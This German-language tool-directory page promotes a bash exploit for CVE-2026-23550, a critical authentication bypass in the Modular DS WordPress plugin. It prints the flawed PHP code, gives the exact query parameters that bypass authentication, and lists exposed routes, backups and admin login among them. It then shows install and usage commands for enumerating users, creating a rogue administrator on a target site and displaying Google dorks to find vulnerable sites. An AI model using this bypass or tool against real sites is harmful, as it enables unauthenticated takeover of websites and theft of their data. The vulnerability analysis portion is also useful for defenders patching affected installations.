Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-23550 — Bash-Skript zur WordPress-Benutzeraufzählung und automatisierten Erstellung von Admin-Konten, das CVE-2026-23550 ausnutzt, um die Authentifizierung zu umgehen und eine nicht authentifizierte Admin-Übernahme zu erreichen. | Kitploit
Tools/GitHubGitHub/dedsecteam-blackhat/cve-2026-23550
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubdedsecteam-blackhat/cve-2026-23550

CVE-2026-23550

Bash-Skript zur WordPress-Benutzeraufzählung und automatisierten Erstellung von Admin-Konten, das CVE-2026-23550 ausnutzt, um die Authentifizierung zu umgehen und eine nicht authentifizierte Admin-Übernahme zu erreichen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 6 MonatenNoch nicht geprüft

CVE-2026-23550

Modular DS <=2.5.1 - Nicht authentifizierte Admin-Übernahme

CVE-ID: CVE-2026-23550 CVSS-Score: 10.0 (KRITISCH) Betroffenes Plugin: Modular DS WordPress Plugin Betroffene Versionen: Alle Versionen bis einschließlich 2.5.1 Gepatchte Version: 2.5.2 (veröffentlicht am 14. Januar 2026) Aktive Ausnutzung: Bestätigt in freier Wildbahn seit dem 13. Januar 2026

Dieses Plugin legt seine API-Routen unter dem Präfix /api/modular-connector/. offen. Diese Routen sind hinter einer Authentifizierungs-Middleware in RouteServiceProvider.php. gruppiert. Die Authentifizierung kann jedoch mithilfe der fehlerhaften Methode isDirectRequest() umgangen werden.

Verwundbarer Code aus HttpUtils.php:

root@kitploit:~
public static function isDirectRequest(): bool
{
    $request = \Modular\ConnectorDependencies\app('request');
    $userAgent = $request->header('User-Agent');
    $userAgentMatches = $userAgent && Str::is('ModularConnector/* (Linux)', $userAgent);
    $originQuery = $request->has('origin') && $request->get('origin') === 'mo';
    $isFromQuery = ($originQuery || $userAgentMatches) && $request->has('type');
    
    // When is wp-load.php request
    if ($isFromQuery) {
        return \true;
    }
    
    return \false;
}

Der Bypass ist denkbar einfach: Fügen Sie einfach die Parameter origin=mo&type=anything in die Anfrage ein. Es gibt keine Überprüfung von Signaturen, Geheimnissen, IP-Adressen oder zwingenden User-Agents – diese Parameter allein reichen aus, damit die Anfrage als Modular direct request betrachtet wird.

Sobald die Anfrage als „direct" betrachtet wird, prüft die Authentifizierungs-Middleware in ModularGuard.php nur noch, ob die Website über validateOrRenewAccessToken() mit Modular verbunden ist. Es gibt keine kryptografische Verknüpfung zwischen der eingehenden Anfrage und Modular selbst.

Offengelegte Routen Mit erfolgreich umgangener Authentifizierung kann ein Angreifer auf Folgendes zugreifen:

root@kitploit:~
/login/{modular_request} – Remote-Login (Admin-Zugriff)

/server-information – sensible Systemdaten

/users/{modular_request} – Benutzer-Enumeration

/backup/* – Website-Backups

/cache/clear – Cache leeren

/manager/* – Verwaltungsfunktionen

/woocommerce/{modular_request} – WooCommerce-Statistiken

Kritischste Login-Route

root@kitploit:~
public function getLogin(SiteRequest $modularRequest)
{
    $user = data_get($modularRequest->body, 'id');

    if (!empty($user)) {
        $user = get_user_by('id', $user);
    }

    if (empty($user)) {
        Cache::driver('wordpress')->forget('user.login');
        $user = ServerSetup::getAdminUser();  // FALLBACK KE ADMIN MANAPUN
    } else {
        Cache::driver('wordpress')->forever('user.login', $user->ID);
    }

    if (empty($user)) {
        throw new \Exception('No admin user detected.');
    }

    $cookies = ServerSetup::loginAs($user, true);  // AUTO-LOGIN

    return Response::redirectTo(admin_url('index.php'))
        ->withCookies($cookies);
}

Wenn keine Benutzer-ID im Request-Body vorhanden ist, sucht der Code nach einem beliebigen vorhandenen Admin (getAdminUser()) und führt direkt einen Login durch.

Autor: (Dedsec Team) Beschreibung: Ein leistungsfähiges Bash-Skript zur WordPress-Benutzer-Enumeration und automatisierten Erstellung von Admin-Konten. Entwickelt nur für Bildungszwecke und autorisierte Sicherheitstests.

🚀 Funktionen

  • Benutzer-Enumeration – Ermittelt WordPress-Benutzernamen durch Durchlaufen von Autor-IDs (/?author=1, /?author=2, usw.)
  • Google-Dork-Anzeige – Zeigt nützliche Google-Dorks zum Auffinden verwundbarer WordPress-Websites (optional)
  • Exploit-Modus – Versucht, einen neuen administrativen Benutzer auf dem Ziel zu erstellen (erfordert ein verwundbares Plugin/Theme oder eine bestimmte CVE)
  • Saubere Ausgabe – Farbcodiertes Konsolen-Feedback für einfaches Lesen

📦 Anforderungen

  • Bash 4+
  • curl (für HTTP-Anfragen)
  • base64 (falls Sie die verschleierte Version verwenden, hehe)

🔧 Installation

root@kitploit:~
git clone https://github.com/DedsecTeam-BlackHat/CVE-2026-23550.git
cd CVE-2026-23550
chmod +x CVE-2026-23550.sh

Verwendung

root@kitploit:~
./CVE-2026-23550.sh [Optionen] <Ziel-URL>
  1. Benutzer auf einem Ziel enumerieren ./CVE-2026-23550.sh -e -t http://targetsite.com
  2. Enumerieren und dann einen Admin-Benutzer erstellen ./CVE-2026-23550.sh -t http://targetsite.com -c -u dedsec_admin -p P@ssw0rd!
  3. Nur Google-Dorks anzeigen ./CVE-2026-23550.sh -d
Tool herunterladen